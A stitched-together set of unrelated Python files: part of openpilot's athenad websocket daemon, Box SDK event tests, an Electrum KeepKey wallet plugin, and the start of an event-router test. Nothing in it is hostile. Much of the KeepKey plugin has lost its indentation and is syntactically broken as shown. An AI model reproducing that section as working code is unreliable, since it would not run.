      chunk = local_sock.recv(4096)
      if not chunk:
        # local_sock is dead
        end_event.set()
        break
      ws.send(chunk, ABNF.OPCODE_BINARY)
    except Exception:
      cloudlog.exception("athenad.ws_proxy_send.exception")
      end_event.set()

  cloudlog.debug("athena.ws_proxy_send closing sockets")
  signal_sock.close()
  cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
  """Receive websocket frames until end_event.

  Text/binary data frames are queued on recv_queue; ping frames refresh
  LastAthenaPingTime. If no ping has been seen for RECONNECT_TIMEOUT_S,
  or any other error occurs, end_event is set to tear the connection down.
  """
  last_ping = int(sec_since_boot() * 1e9)
  while not end_event.is_set():
    try:
      opcode, data = ws.recv_data(control_frame=True)
      if opcode == ABNF.OPCODE_TEXT:
        recv_queue.put_nowait(data.decode("utf-8"))
      elif opcode == ABNF.OPCODE_BINARY:
        recv_queue.put_nowait(data)
      elif opcode == ABNF.OPCODE_PING:
        last_ping = int(sec_since_boot() * 1e9)
        Params().put("LastAthenaPingTime", str(last_ping))
    except WebSocketTimeoutException:
      ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
      if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
        cloudlog.exception("athenad.ws_recv.timeout")
        end_event.set()
    except Exception:
      cloudlog.exception("athenad.ws_recv.exception")
      end_event.set()
def ws_send(ws, end_event):
  """Drain outgoing queues onto the websocket until end_event.

  send_queue has priority; low_priority_send_queue is only consulted when
  send_queue is empty. Payloads longer than WS_FRAME_SIZE are split into
  a TEXT frame followed by CONT frames.
  """
  while not end_event.is_set():
    try:
      try:
        payload = send_queue.get_nowait()
      except queue.Empty:
        payload = low_priority_send_queue.get(timeout=1)
      for offset in range(0, len(payload), WS_FRAME_SIZE):
        chunk = payload[offset:offset + WS_FRAME_SIZE]
        fin = offset + WS_FRAME_SIZE >= len(payload)
        opcode = ABNF.OPCODE_TEXT if offset == 0 else ABNF.OPCODE_CONT
        ws.send_frame(ABNF.create_frame(chunk, opcode, fin))
    except queue.Empty:
      pass
    except Exception:
      cloudlog.exception("athenad.ws_send.exception")
      end_event.set()
def backoff(retries):
  """Randomized exponential backoff: uniform in [0, 2**retries), capped at 127."""
  ceiling = min(128, 2 ** retries)
  return random.randrange(ceiling)
def main():
  """Athena daemon entry point.

  Maintains a websocket connection to ATHENA_HOST, restoring the persisted
  upload queue first, and reconnects with randomized exponential backoff
  on failure.
  """
  params = Params()
  dongle_id = params.get("DongleId", encoding='utf-8')
  UploadQueueCache.initialize(upload_queue)
  ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
  api = Api(dongle_id)
  conn_retries = 0
  while 1:
    try:
      cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
      ws = create_connection(ws_uri,
                             cookie="jwt=" + api.get_token(),
                             enable_multithread=True,
                             timeout=30.0)
      cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
      params.delete("PrimeRedirected")
      conn_retries = 0
      cur_upload_items.clear()
      # blocks for the lifetime of this connection
      handle_long_poll(ws)
    except (KeyboardInterrupt, SystemExit):
      break
    except (ConnectionError, TimeoutError, WebSocketException):
      conn_retries += 1
      params.delete("PrimeRedirected")
      params.delete("LastAthenaPingTime")
    except socket.timeout:
      # NOTE(review): this probe appears to detect a carrier HTTP redirect
      # (no-prime captive portal) and records it — confirm against server docs.
      try:
        r = requests.get("http://api.commadotai.com/v1/me", allow_redirects=False,
                         headers={"User-Agent": f"openpilot-{get_version()}"}, timeout=15.0)
        if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
          params.put_bool("PrimeRedirected", True)
      except Exception:
        cloudlog.exception("athenad.socket_timeout.exception")
      params.delete("LastAthenaPingTime")
    except Exception:
      cloudlog.exception("athenad.main.exception")
      conn_retries += 1
      params.delete("PrimeRedirected")
      params.delete("LastAthenaPingTime")
    time.sleep(backoff(conn_retries))
# Script entry point: run the Athena daemon.
if __name__ == "__main__":
  main()
|
test_events.py | # coding: utf-8
from __future__ import unicode_literals
from threading import Event, Thread
import pytest
import requests
from boxsdk.object.folder import FolderSyncState
@pytest.fixture
def box_events(box_client):
    # Events endpoint object for the shared test client.
    return box_client.events()
@pytest.fixture
def move_target(box_client):
    # Fresh root-level folder used as the destination for move tests.
    return box_client.folder('0').create_subfolder('move target')
@pytest.fixture
def copy_target(box_client):
    # Fresh root-level folder used as the destination for copy tests.
    return box_client.folder('0').create_subfolder('copy target')
@pytest.fixture
def assert_event(box_events):
    """Fixture returning a helper that runs `get_item` and asserts exactly one
    event of `event_type`, matching the item's name and id, is visible from
    `stream_position`."""
    # pylint:disable=redefined-outer-name
    def helper(get_item, event_type, stream_position=0):
        item = get_item()
        entries = box_events.get_events(stream_position=stream_position)['entries']
        assert len(entries) == 1
        entry = entries[0]
        assert entry['event_type'] == event_type
        assert entry['source']['name'] == item.name
        assert entry['source']['id'] == item.id
    return helper
def test_get_long_poll_url(box_client):
    # The long-poll URL should hold the connection open (so a tiny timeout fires).
    options = box_client.events().get_long_poll_options()
    with pytest.raises(requests.Timeout):
        requests.get(options['url'], timeout=0.11)
def test_upload_causes_upload_event(uploaded_file, assert_event):
    # pylint:disable=redefined-outer-name
    # Uploading a file should emit a single ITEM_UPLOAD event for it.
    assert_event(lambda: uploaded_file, 'ITEM_UPLOAD')
def test_create_folder_causes_create_event(created_subfolder, assert_event):
    # pylint:disable=redefined-outer-name
    # Creating a folder should emit a single ITEM_CREATE event for it.
    assert_event(lambda: created_subfolder, 'ITEM_CREATE')
def test_move_file_causes_move_event(box_events, move_target, uploaded_file, assert_event):
    # pylint:disable=redefined-outer-name
    # Moving a file should emit ITEM_MOVE after the current stream position.
    assert_event(lambda: uploaded_file.move(move_target), 'ITEM_MOVE', box_events.get_latest_stream_position())
def test_move_folder_causes_move_event(box_events, move_target, created_subfolder, assert_event):
    # pylint:disable=redefined-outer-name
    # Moving a folder should emit ITEM_MOVE after the current stream position.
    assert_event(lambda: created_subfolder.move(move_target), 'ITEM_MOVE', box_events.get_latest_stream_position())
def test_rename_file_causes_rename_event(box_events, uploaded_file, assert_event):
    # pylint:disable=redefined-outer-name
    # Renaming a file should emit ITEM_RENAME after the current stream position.
    updated_name = 'updated_{0}'.format(uploaded_file.name)
    assert_event(lambda: uploaded_file.rename(updated_name), 'ITEM_RENAME', box_events.get_latest_stream_position())
def test_rename_folder_causes_rename_event(box_events, created_subfolder, assert_event):
    # pylint:disable=redefined-outer-name
    # Renaming a folder should emit ITEM_RENAME after the current stream position.
    updated_name = 'updated_{0}'.format(created_subfolder.name)
    assert_event(lambda: created_subfolder.rename(updated_name), 'ITEM_RENAME', box_events.get_latest_stream_position())
def test_copy_file_causes_copy_event(box_events, copy_target, uploaded_file, assert_event):
    # pylint:disable=redefined-outer-name
    # Copying a file should emit ITEM_COPY after the current stream position.
    assert_event(lambda: uploaded_file.copy(copy_target), 'ITEM_COPY', box_events.get_latest_stream_position())
def test_copy_folder_causes_copy_event(box_events, copy_target, created_subfolder, assert_event):
    # pylint:disable=redefined-outer-name
    # Copying a folder should emit ITEM_COPY after the current stream position.
    assert_event(lambda: created_subfolder.copy(copy_target), 'ITEM_COPY', box_events.get_latest_stream_position())
@pytest.mark.xfail(reason='trash event has no source')
def test_delete_file_causes_trash_event(box_events, uploaded_file, assert_event):
    # pylint:disable=redefined-outer-name
    # Deleting a file should emit ITEM_TRASH (known to fail: no source on trash events).
    assert_event(uploaded_file.delete, 'ITEM_TRASH', box_events.get_latest_stream_position())
@pytest.mark.xfail(reason='trash event has no source')
def test_delete_folder_causes_trash_event(box_events, created_subfolder, assert_event):
    # pylint:disable=redefined-outer-name
    # Deleting a folder should emit ITEM_TRASH (known to fail: no source on trash events).
    assert_event(created_subfolder.delete, 'ITEM_TRASH', box_events.get_latest_stream_position())
@pytest.mark.parametrize('sync_state,event_type', [
    (FolderSyncState.IS_SYNCED, 'ITEM_SYNC'),
    (FolderSyncState.NOT_SYNCED, 'ITEM_UNSYNC'),
])
def test_sync_folder_causes_sync_event(box_events, created_subfolder, assert_event, sync_state, event_type):
    # pylint:disable=redefined-outer-name
    # Changing a folder's sync state should emit the matching ITEM_SYNC/ITEM_UNSYNC event.
    assert_event(
        lambda: created_subfolder.update_sync_state(sync_state.value),
        event_type,
        box_events.get_latest_stream_position(),
    )
@pytest.fixture
def long_poll_generator(box_events, uploaded_file, request):
    """Fixture: run the long-polling event generator on a background thread.

    The returned thread carries test-visible state:
      - events: events received so far
      - event_ready: set after each event is appended
      - consumed_events: test sets this to let the thread fetch the next event
      - should_stop_polling: flag checked after each event to end the loop

    The finalizer unblocks the generator (by deleting the uploaded file so a
    final event arrives), closes it, and joins the thread.
    """
    # pylint:disable=redefined-outer-name
    generator = box_events.generate_events_with_long_polling(stream_position=0)
    def long_poll():
        for event in generator:
            long_poll_thread.events.append(event)
            long_poll_thread.event_ready.set()
            if long_poll_thread.should_stop_polling:
                return
            # wait until the test has consumed this event before polling again
            long_poll_thread.consumed_events.wait()
            long_poll_thread.consumed_events.clear()
    long_poll_thread = Thread(target=long_poll)
    long_poll_thread.should_stop_polling = False
    long_poll_thread.events = []
    long_poll_thread.event_ready = Event()
    long_poll_thread.consumed_events = Event()
    long_poll_thread.start()
    def fin():
        long_poll_thread.should_stop_polling = True
        # deleting the file produces one more event, unblocking the generator
        uploaded_file.delete()
        long_poll_thread.event_ready.wait()
        generator.close()
        long_poll_thread.join()
    request.addfinalizer(fin)
    return long_poll_thread
def test_generate_events_with_long_polling(long_poll_generator, created_subfolder, uploaded_file):
    """Long polling should deliver the create/upload events from the fixtures,
    and then the rename events produced mid-test, with correct types/ids/names."""
    # pylint:disable=redefined-outer-name
    # consume the two events caused by the created_subfolder/uploaded_file fixtures
    long_poll_generator.event_ready.wait()
    long_poll_generator.event_ready.clear()
    long_poll_generator.consumed_events.set()
    long_poll_generator.event_ready.wait()
    long_poll_generator.event_ready.clear()
    long_poll_generator.consumed_events.set()
    # no third event should arrive
    assert not long_poll_generator.event_ready.wait(timeout=0.01)
    assert len(long_poll_generator.events) == 2
    folder_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'folder')
    file_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'file')
    assert folder_event['event_type'] == 'ITEM_CREATE'
    assert file_event['event_type'] == 'ITEM_UPLOAD'
    assert folder_event['source']['id'] == created_subfolder.id
    assert file_event['source']['id'] == uploaded_file.id
    assert folder_event['source']['name'] == created_subfolder.name
    assert file_event['source']['name'] == uploaded_file.name
    # now trigger two rename events and consume them the same way
    del long_poll_generator.events[:]
    uploaded_file.rename('updated_{0}'.format(uploaded_file.name))
    created_subfolder.rename('updated_{0}'.format(created_subfolder.name))
    long_poll_generator.event_ready.wait()
    long_poll_generator.event_ready.clear()
    long_poll_generator.consumed_events.set()
    long_poll_generator.event_ready.wait()
    long_poll_generator.event_ready.clear()
    long_poll_generator.consumed_events.set()
    assert not long_poll_generator.event_ready.wait(timeout=0.01)
    assert len(long_poll_generator.events) == 2
    folder_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'folder')
    file_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'file')
    assert folder_event['event_type'] == 'ITEM_RENAME'
    assert file_event['event_type'] == 'ITEM_RENAME'
    assert folder_event['source']['id'] == created_subfolder.id
    assert file_event['source']['id'] == uploaded_file.id
    assert folder_event['source']['name'] == 'updated_{0}'.format(created_subfolder.name)
    assert file_event['source']['name'] == 'updated_{0}'.format(uploaded_file.name)
|
keepkey.py | from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.plugin import Device, runs_in_hwd_thread
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
# TIM_NEW: device generates a fresh seed; TIM_RECOVER: on-device seed recovery;
# TIM_MNEMONIC: upload a BIP39 mnemonic; TIM_PRIVKEY: upload a master private key.
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
    """Keystore backed by a KeepKey hardware wallet."""
    hw_type = 'keepkey'
    device = 'KeepKey'
    plugin: 'KeepKeyPlugin'

    def get_client(self, force_pair=True):
        """Return the hardware client for this keystore (pairing if needed)."""
        return self.plugin.get_client(self, force_pair)

    def decrypt_message(self, sequence, message, password):
        """Message decryption is not supported by KeepKey."""
        raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))

    @runs_in_hwd_thread
    def sign_message(self, sequence, message, password):
        """Sign `message` on-device with the key at derivation suffix `sequence`."""
        client = self.get_client()
        address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
        address_n = client.expand_path(address_path)
        msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
        return msg_sig.signature

    @runs_in_hwd_thread
    def sign_transaction(self, tx, password):
        """Sign `tx` on-device; no-op when the tx is already complete.

        Collects the previous transactions the device needs to verify
        legacy (non-segwit) input amounts.
        """
        if tx.is_complete():
            return
        # previous transactions used as inputs
        prev_tx = {}
        for txin in tx.inputs():
            tx_hash = txin.prevout.txid.hex()
            if txin.utxo is None and not txin.is_segwit():
                raise UserFacingException(_('Missing previous tx for legacy input.'))
            prev_tx[tx_hash] = txin.utxo
        self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
    """Hardware-wallet plugin for KeepKey devices (HID and WebUSB transports)."""
    # Derived classes provide:
    #
    # class-static variables: client_class, firmware_URL, handler_class,
    # libraries_available, libraries_URL, minimum_firmware,
    # wallet_class, ckd_public, types, HidTransport

    firmware_URL = 'https://www.keepkey.com'
    libraries_URL = 'https://github.com/keepkey/python-keepkey'
    minimum_firmware = (1, 0, 0)  # oldest firmware this plugin will talk to
    keystore_class = KeepKey_KeyStore
    SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
    MAX_LABEL_LEN = 32  # device label length limit
    def __init__(self, parent, config, name):
        """Set up keepkeylib transports; marks libraries_available False when
        the keepkey Python packages are not installed."""
        HW_PluginBase.__init__(self, parent, config, name)
        try:
            from . import client
            import keepkeylib
            import keepkeylib.ckd_public
            import keepkeylib.transport_hid
            import keepkeylib.transport_webusb
            self.client_class = client.KeepKeyClient
            self.ckd_public = keepkeylib.ckd_public
            self.types = keepkeylib.client.types
            self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
                               keepkeylib.transport_webusb.DEVICE_IDS)
            # only "register" hid device id:
            self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
            # for webusb transport, use custom enumerate function:
            self.device_manager().register_enumerate_func(self.enumerate)
            self.libraries_available = True
        except ImportError:
            self.libraries_available = False
@runs_in_hwd_thread
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
    @runs_in_hwd_thread
    def hid_transport(self, pair):
        """Open an HID transport for the given device path pair."""
        from keepkeylib.transport_hid import HidTransport
        return HidTransport(pair)
@runs_in_hwd_thread
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in WebUsbTransport.enumerate():
if device.path == self._dev_to_str(dev):
return WebUsbTransport(dev)
@runs_in_hwd_thread
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
    @runs_in_hwd_thread
    def create_client(self, device, handler):
        """Connect to `device` (WebUSB or HID), sanity-check it with a ping,
        and verify its firmware version. Returns a client or None."""
        # NOTE(review): product_key[1] == 2 appears to select the WebUSB
        # product id — confirm against keepkeylib DEVICE_IDS.
        if device.product_key[1] == 2:
            transport = self._try_webusb(device)
        else:
            transport = self._try_hid(device)
        if not transport:
            self.logger.info("cannot connect to device")
            return
        self.logger.info(f"connected to device at {device.path}")
        client = self.client_class(transport, handler, self)
        # Try a ping for device sanity
        try:
            client.ping('t')
        except BaseException as e:
            self.logger.info(f"ping failed {e}")
            return None
        if not client.atleast_version(*self.minimum_firmware):
            msg = (_('Outdated {} firmware for device labelled {}. Please '
                     'download the updated firmware from {}')
                   .format(self.device, client.label(), self.firmware_URL))
            self.logger.info(msg)
            if handler:
                handler.show_error(msg)
            else:
                raise UserFacingException(msg)
            return None
        return client
    @runs_in_hwd_thread
    def get_client(self, keystore, force_pair=True, *,
                   devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
        """Return the client for `keystore`, marking it used when found."""
        client = super().get_client(keystore, force_pair,
                                    devices=devices,
                                    allow_user_interaction=allow_user_interaction)
        # returns the client for a given keystore. can use xpub
        if client:
            client.used()
        return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "UraniumX"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
    @runs_in_hwd_thread
    def _initialize_device(self, settings, method, device_id, wizard, handler):
        """Drive the on-device initialization for the chosen TIM_* method.

        `settings` unpacks to (item, label, pin_protection,
        passphrase_protection); `item` is overloaded per method (strength /
        word-count index, mnemonic string, or xprv).
        """
        item, label, pin_protection, passphrase_protection = settings
        language = 'english'
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        if not client:
            raise Exception(_("The device was disconnected."))
        if method == TIM_NEW:
            strength = 64 * (item + 2)  # 128, 192 or 256
            client.reset_device(True, strength, passphrase_protection,
                                pin_protection, label, language)
        elif method == TIM_RECOVER:
            word_count = 6 * (item + 2)  # 12, 18 or 24
            client.step = 0
            client.recovery_device(word_count, passphrase_protection,
                                   pin_protection, label, language)
        elif method == TIM_MNEMONIC:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_mnemonic(str(item), pin,
                                           passphrase_protection,
                                           label, language)
        else:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_xprv(item, pin, passphrase_protection,
                                       label, language)
    def _make_node_path(self, xpub, address_n):
        """Build a keepkeylib HDNodePathType from an xpub and derivation suffix."""
        bip32node = BIP32Node.from_xkey(xpub)
        node = self.types.HDNodeType(
            depth=bip32node.depth,
            fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
            child_num=int.from_bytes(bip32node.child_number, 'big'),
            chain_code=bip32node.chaincode,
            public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
        )
        return self.types.HDNodePathType(node=node, address_n=address_n)
    def setup_device(self, device_info, wizard, purpose):
        """Prepare the device for use: initialize it if needed and fetch a
        root xpub to force pairing/PIN entry. Returns the client."""
        device_id = device_info.device.id_
        client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
        if not device_info.initialized:
            self.initialize_device(device_id, wizard, client.handler)
        wizard.run_task_without_blocking_gui(
            task=lambda: client.get_xpub("m", 'standard'))
        client.used()
        return client
    def get_xpub(self, device_id, derivation, xtype, wizard):
        """Fetch the xpub at `derivation` from the device; rejects script
        types outside SUPPORTED_XTYPES."""
        if xtype not in self.SUPPORTED_XTYPES:
            raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
        client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
        xpub = client.get_xpub(derivation, xtype)
        client.used()
        return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
    @runs_in_hwd_thread
    def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
        """Sign `tx` on-device and merge the resulting signatures into it.

        `prev_tx` maps txid -> previous transaction, used by the device to
        verify input amounts.
        """
        self.prev_tx = prev_tx
        client = self.get_client(keystore)
        inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
        outputs = self.tx_outputs(tx, keystore=keystore)
        signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
                                    lock_time=tx.locktime, version=tx.version)[0]
        # append SIGHASH_ALL byte to each DER signature
        signatures = [(bh2u(x) + '01') for x in signatures]
        tx.update_signatures(signatures)
    @runs_in_hwd_thread
    def show_address(self, wallet, address, keystore=None):
        """Display `address` on the device screen for user verification.

        Builds the multisig descriptor when the wallet has multiple master
        keys so the device can verify the script as well.
        """
        if keystore is None:
            keystore = wallet.get_keystore()
        if not self.show_address_helper(wallet, address, keystore):
            return
        client = self.get_client(keystore)
        if not client.atleast_version(1, 3):
            keystore.handler.show_error(_("Your device firmware is too old"))
            return
        deriv_suffix = wallet.get_address_index(address)
        derivation = keystore.get_derivation_prefix()
        address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
        address_n = client.expand_path(address_path)
        script_type = self.get_keepkey_input_script_type(wallet.txin_type)
        # prepare multisig, if available:
        xpubs = wallet.get_master_public_keys()
        if len(xpubs) > 1:
            pubkeys = wallet.get_public_keys(address)
            # sort xpubs using the order of pubkeys
            sorted_pairs = sorted(zip(pubkeys, xpubs))
            multisig = self._make_multisig(
                wallet.m,
                [(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
        else:
            multisig = None
        client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
    """Convert the inputs of *tx* into KeepKey TxInputType messages.

    When for_sig is True, *tx* must be a PartialTransaction and *keystore*
    must be supplied: script type, multisig metadata and our own derivation
    path are attached so the device can sign.  When for_sig is False (used
    when serializing previous transactions) only outpoint, amount, script_sig
    and sequence are filled in.
    """
    inputs = []
    for txin in tx.inputs():
        txinputtype = self.types.TxInputType()
        if txin.is_coinbase_input():
            # Coinbase inputs spend the null outpoint.
            prev_hash = b"\x00"*32
            prev_index = 0xffffffff  # signed int -1
        else:
            if for_sig:
                assert isinstance(tx, PartialTransaction)
                assert isinstance(txin, PartialTxInput)
                assert keystore
                if len(txin.pubkeys) > 1:
                    # Multisig input: describe the full m-of-n setup.
                    xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
                    multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
                else:
                    multisig = None
                script_type = self.get_keepkey_input_script_type(txin.script_type)
                # Rebuild the message with signing metadata attached.
                txinputtype = self.types.TxInputType(
                    script_type=script_type,
                    multisig=multisig)
                my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
                if full_path:
                    txinputtype.address_n.extend(full_path)
            prev_hash = txin.prevout.txid
            prev_index = txin.prevout.out_idx
        # Fields common to both the signing and prev-tx cases.
        if txin.value_sats() is not None:
            txinputtype.amount = txin.value_sats()
        txinputtype.prev_hash = prev_hash
        txinputtype.prev_index = prev_index
        if txin.script_sig is not None:
            txinputtype.script_sig = txin.script_sig
        txinputtype.sequence = txin.nsequence
        inputs.append(txinputtype)
    return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
    """Convert the outputs of *tx* into KeepKey TxOutputType messages.

    At most one of our own outputs (preferring the 'change' branch) is
    described by derivation path so the device recognises it as ours and
    hides it from the confirmation screen; all other outputs are sent as
    plain addresses or OP_RETURN data.
    """
    def create_output_by_derivation():
        # Describe the output by its BIP32 path (plus multisig metadata) so
        # the device can verify it belongs to this wallet.
        # NOTE: reads `txout` from the enclosing loop below.
        script_type = self.get_keepkey_output_script_type(txout.script_type)
        if len(txout.pubkeys) > 1:
            xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
            multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
        else:
            multisig = None
        my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
        assert full_path
        txoutputtype = self.types.TxOutputType(
            multisig=multisig,
            amount=txout.value,
            address_n=full_path,
            script_type=script_type)
        return txoutputtype
    def create_output_by_address():
        # Plain output: either a regular address or OP_RETURN data.
        txoutputtype = self.types.TxOutputType()
        txoutputtype.amount = txout.value
        if address:
            txoutputtype.script_type = self.types.PAYTOADDRESS
            txoutputtype.address = address
        else:
            txoutputtype.script_type = self.types.PAYTOOPRETURN
            txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
        return txoutputtype
    outputs = []
    has_change = False
    any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
    for txout in tx.outputs():
        address = txout.address
        use_create_by_derivation = False
        if txout.is_mine and not has_change:
            # prioritise hiding outputs on the 'change' branch from user
            # because no more than one change address allowed
            if txout.is_change == any_output_on_change_branch:
                use_create_by_derivation = True
                has_change = True
        if use_create_by_derivation:
            txoutputtype = create_output_by_derivation()
        else:
            txoutputtype = create_output_by_address()
        outputs.append(txoutputtype)
    return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
    """Convert an electrum Transaction into the device library's TransactionType.

    A None input yields an empty message (segwit inputs do not need the
    previous transaction).
    """
    txtype = self.types.TransactionType()
    if tx is None:
        # probably for segwit input and we don't need this prev txn
        return txtype
    tx.deserialize()
    txtype.version = tx.version
    txtype.lock_time = tx.locktime
    txtype.inputs.extend(self.tx_inputs(tx))
    for txout in tx.outputs():
        bin_out = txtype.bin_outputs.add()
        bin_out.amount = txout.value
        bin_out.script_pubkey = txout.scriptpubkey
    return txtype
# Callback invoked by the TREZOR/KeepKey libraries (via tx_api) to fetch
# previous transactions stashed by sign_transaction().
def get_tx(self, tx_hash):
    """Return the stashed previous transaction *tx_hash*, converted for the device."""
    prev = self.prev_tx[tx_hash]
    return self.electrum_tx_to_txtype(prev)
|
TestEventRouterThreaded.py | # Copyright L.P.Klyne 2013
# Licenced under 3 clause BSD licence
# $Id: TestEventRouterThreaded.py 2612 2008-08-11 20:08:49Z graham.klyne $
#
# Unit testing for threaded event router functions
#
# This TestEventRouter as a base class, but substututes setUp and
# tearDown functions to use the EventRouterThreaded class, and adds
# some text cases to confirm expected multithreading behaviour.
#
import sys
import unittest
import logging
import time
from Queue import Queue
from threading import Thread
sys.path.append("../..")
from MiscLib.Functions import compareLists
from MiscLib.Logging import Trace, Info
from EventLib.Event import Event, makeEvent
from EventLib.Status import Status, StatusVal
from EventLib.SyncDeferred import makeDeferred
from EventLib.EventAgent import EventAgent, makeEventAgent
from EventLib.EventHandler import EventHandler, makeEventHandler
